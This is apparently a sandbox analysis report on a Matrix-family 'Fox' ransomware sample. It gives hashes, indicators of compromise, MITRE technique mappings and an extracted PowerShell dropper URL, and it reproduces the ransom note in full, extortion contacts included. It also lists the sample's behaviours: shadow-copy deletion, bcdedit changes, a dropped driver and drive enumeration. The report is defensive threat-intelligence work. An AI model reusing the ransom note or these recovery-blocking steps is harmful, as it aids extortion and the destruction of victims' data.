matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
150s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
03-04-2024 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Size

1.2MB
MD5

76b640aa00354e46b29ca7ac2adfd732
SHA1

afebf9d72ba7186afefebf4deda87675621b0b8b
SHA256

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
SHA512

fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
SSDEEP

24576:l/SA+2lraRrjSJR5ezmT1dM9tZBrPyvaNn:zXlabPyyN

Score

10^/10

matrix discovery evasion persistence ransomware upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 5E907C9709EBDB87\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 5E907C9709EBDB87\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 2NvceLix\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\Admin\Desktop\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Microsoft\Assistance\Client\1.0\fr-FR\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\3082\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Basic\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
240	bcdedit.exe
2196	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	2688	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	dghZRO1Y64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	dghZRO1Y64.exe

Executes dropped EXE 3 IoCs

pid	Process
2632	NWBuRTjd.exe
1800	dghZRO1Y.exe
2928	dghZRO1Y64.exe

Loads dropped DLL 4 IoCs

pid	Process
2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
880	cmd.exe
1800	dghZRO1Y.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1984	takeown.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/0x000600000001601c-1466.dat	upx
behavioral3/memory/1800-1874-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	dghZRO1Y64.exe
File opened (read-only)	\??\M:	dghZRO1Y64.exe
File opened (read-only)	\??\S:	dghZRO1Y64.exe
File opened (read-only)	\??\W:	dghZRO1Y64.exe
File opened (read-only)	\??\X:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\O:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\K:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\E:	dghZRO1Y64.exe
File opened (read-only)	\??\L:	dghZRO1Y64.exe
File opened (read-only)	\??\Z:	dghZRO1Y64.exe
File opened (read-only)	\??\V:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\T:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\R:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\G:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\H:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\G:	dghZRO1Y64.exe
File opened (read-only)	\??\K:	dghZRO1Y64.exe
File opened (read-only)	\??\N:	dghZRO1Y64.exe
File opened (read-only)	\??\N:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\E:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\H:	dghZRO1Y64.exe
File opened (read-only)	\??\J:	dghZRO1Y64.exe
File opened (read-only)	\??\O:	dghZRO1Y64.exe
File opened (read-only)	\??\U:	dghZRO1Y64.exe
File opened (read-only)	\??\V:	dghZRO1Y64.exe
File opened (read-only)	\??\U:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\Q:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\J:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
